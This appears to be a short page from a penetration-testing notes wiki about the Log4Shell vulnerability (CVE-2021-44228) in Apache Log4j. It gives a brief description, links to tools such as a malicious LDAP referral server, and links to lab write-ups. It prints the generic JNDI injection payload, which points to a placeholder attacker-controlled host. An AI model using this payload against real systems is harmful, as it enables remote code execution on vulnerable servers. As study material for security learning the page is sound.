search

Apache Log4j

Exploiting Apache Java logging framework

hashtag
CVE-2021-44228

LogoNVD - CVE-2021-44228nvd.nist.govchevron-right

On December 9th, 2021, the world was made aware of a new vulnerability identified as CVE-2021-44228, affecting the Java logging package log4j. This vulnerability earned a severity score of 10.0 (the most critical designation) and offers remote code trivial remote code execution on hosts engaging with software that utilizes this log4j version. This attack has been dubbed "Log4Shell"

LogoGitHub - YfryTchsGD/Log4jAttackSurfaceGitHubchevron-right
https://log4shell.huntress.com/log4shell.huntress.comchevron-right

The general payload to abuse this log4j vulnerability. The format of the usual syntax that takes advantage of this looks like:

${jndi:ldap://ATTACKERCONTROLLEDHOST}

hashtag
LDAP Referral Server

LogoGitHub - mbechler/marshalsecGitHubchevron-right
LogoGitHub - veracode-research/rogue-jndi: A malicious LDAP server for JNDI injection attacksGitHubchevron-right

hashtag
Resources/POC

LogoSolar, exploiting log4jTryHackMechevron-right
LogoWrite-Up: Hack The Box: Starting Point — Unified (Tier 2)Mediumchevron-right
PreviousVulnhub/ PG/ THM/ HTBNextLinux Forensics Cheatsheet

Last updated